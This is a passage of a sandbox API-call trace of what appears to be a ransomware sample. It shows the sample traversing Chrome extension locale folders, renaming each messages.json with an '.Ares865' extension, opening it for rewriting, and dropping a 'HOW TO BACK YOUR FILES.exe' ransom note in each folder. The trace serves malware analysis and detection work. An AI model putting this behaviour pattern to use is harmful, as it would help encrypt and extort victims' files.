lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.969] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.969] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.969] lstrlenW (lpString="messages.json") returned 13 [0101.969] lstrlenW (lpString="Ares865") returned 7 [0101.969] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.Ares865") returned 160 [0101.969] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=183) returned 1 [0101.974] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa" [0101.975] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa" [0101.975] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.975] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.975] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.976] GetLastError () returned 0x0 [0101.976] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.976] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.976] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.976] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.976] lstrlenW (lpString="messages.json") returned 13 [0101.976] lstrlenW (lpString="Ares865") returned 7 [0101.976] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.976] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.Ares865") returned 160 [0101.976] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=255) returned 1 [0101.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu" [0101.981] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu" [0101.981] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.981] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.982] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.982] GetLastError () returned 0x0 [0101.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.982] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.983] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.983] lstrlenW (lpString="messages.json") returned 13 [0101.983] lstrlenW (lpString="Ares865") returned 7 [0101.983] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.983] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.Ares865") returned 160 [0101.983] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.984] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=152) returned 1 [0101.988] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et" [0101.988] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et" [0101.988] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.988] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.988] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.989] GetLastError () returned 0x0 [0101.989] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.989] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.989] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.989] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.989] lstrlenW (lpString="messages.json") returned 13 [0101.989] lstrlenW (lpString="Ares865") returned 7 [0101.989] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.990] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.Ares865") returned 160 [0101.990] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.991] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=212) returned 1 [0101.995] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419" [0101.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419" [0101.995] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.995] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.995] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.996] GetLastError () returned 0x0 [0101.996] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.996] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.996] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.996] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.996] lstrlenW (lpString="messages.json") returned 13 [0101.996] lstrlenW (lpString="Ares865") returned 7 [0101.996] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.997] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.Ares865") returned 164 [0101.997] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=227) returned 1 [0102.001] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es" [0102.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es" [0102.001] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.001] 